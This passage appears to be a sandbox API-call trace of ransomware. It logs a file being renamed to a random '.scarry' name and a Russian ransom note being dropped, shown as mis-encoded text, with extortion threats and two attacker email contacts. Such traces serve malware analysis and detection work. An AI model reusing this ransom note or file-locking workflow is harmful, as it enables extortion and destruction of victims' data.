information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.406] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.406] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.406] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.406] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.407] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.407] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.407] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.407] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.407] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.407] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.407] GlobalUnlock (hMem=0x45000c) returned 0 [0109.407] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.407] GlobalLock (hMem=0x450004) returned 0x593998 [0109.408] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.408] GlobalUnlock (hMem=0x45000c) returned 0 [0109.408] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.408] GlobalUnlock (hMem=0x450004) returned 0 [0109.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.433] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0109.433] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.433] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.434] GlobalLock (hMem=0x450004) returned 0x591988 [0109.434] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.434] GlobalUnlock (hMem=0x450004) returned 0 [0109.434] GlobalLock (hMem=0x450004) returned 0x591988 [0109.434] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.434] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.434] GlobalUnlock (hMem=0x450004) returned 0 [0109.434] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.434] GlobalUnlock (hMem=0x45000c) returned 0 [0109.434] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.434] CharLowerBuffW (in: lpsz="CGMIMP32.CFG", cchLength=0xc | out: lpsz="cgmimp32.cfg") returned 0xc [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpUsedDefaultChar=0x0) returned 67 [0109.435] CharLowerBuffW (in: lpsz=".CFG", cchLength=0x4 | out: lpsz=".cfg") returned 0x4 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".cfg", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cfgShared\\GRPHFLT\\CGMIMP32.CFG", lpUsedDefaultChar=0x0) returned 4 [0109.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0109.435] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d18*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d18*, lpNumberOfBytesWritten=0x18ed70*=0x1, lpOverlapped=0x0) returned 1 [0109.436] CloseHandle (hObject=0x1a4) returned 1 [0109.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\я")) returned 1 [0109.438] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 0x58b060 [0109.438] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0109.438] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0109.438] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", dwFileAttributes=0x20) returned 1 [0109.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x1a9b [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0109.438] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x1a9b, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x1a9b, lpOverlapped=0x0) returned 1 [0109.463] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.464] GlobalLock (hMem=0x450004) returned 0x593998 [0109.464] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.464] GlobalUnlock (hMem=0x45000c) returned 0 [0109.464] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.464] GlobalUnlock (hMem=0x450004) returned 0 [0109.464] GlobalLock (hMem=0x450004) returned 0x591988 [0109.464] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.464] GlobalUnlock (hMem=0x450004) returned 0 [0110.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7bb18, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry") returned 39 [0110.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\m5ypzectirtzy92aimbfka6hfij6lhuq.scarry")) returned 1 [0110.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\m5ypzectirtzy92aimbfka6hfij6lhuq.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0110.411] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0110.411] CloseHandle (hObject=0x1a4) returned 1 [0110.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry", dwFileAttributes=0x20) returned 1 [0110.411] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0110.412] GlobalLock (hMem=0x450004) returned 0x591988 [0110.412] GlobalHandle (pMem=0x591988) returned 0x450004 [0110.412] GlobalUnlock (hMem=0x450004) returned 0 [0110.412] GlobalLock (hMem=0x450004) returned 0x591988 [0110.412] GlobalLock (hMem=0x45000c) returned 0x593998 [0110.412] GlobalHandle (pMem=0x591988) returned 0x450004 [0110.412] GlobalUnlock (hMem=0x450004) returned 0 [0110.412] GlobalHandle (pMem=0x593998) returned 0x45000c [0110.412] GlobalUnlock (hMem=0x45000c) returned 0 [0110.412] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0110.412] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0110.412] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="駐Ǫ\x18\x03", cAlternateFileName="")) returned 0xffffffff [0110.413] GetLastError () returned 0x2 [0110.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0110.413] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18ed24*=0xdf9, lpOverlapped=0x0) returned 1 [0110.414] CloseHandle (hObject=0x1a4) returned 1 [0110.415] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0110.415] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0110.415] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0110.415] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.415] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.415] GlobalUnlock (hMem=0x45000c) returned 0 [0110.415] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.415] GlobalLock (hMem=0x450004) returned 0x593998 [0110.415] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.415] GlobalUnlock (hMem=0x45000c) returned 0 [0110.415] GlobalHandle (pMem=0x593998) returned 0x450004 [0110.415] GlobalUnlock (hMem=0x450004) returned 0 [0110.415] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0110.416] CharLowerBuffW (in: lpsz="CGMIMP32.FLT", cchLength=0xc | out: lpsz="cgmimp32.flt") returned 0xc [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpUsedDefaultChar=0x0) returned 67 [0110.417] CharLowerBuffW (in: lpsz=".FLT", cchLength=0x4 | out: lpsz=".flt") returned 0x4 [0110.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".flt", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 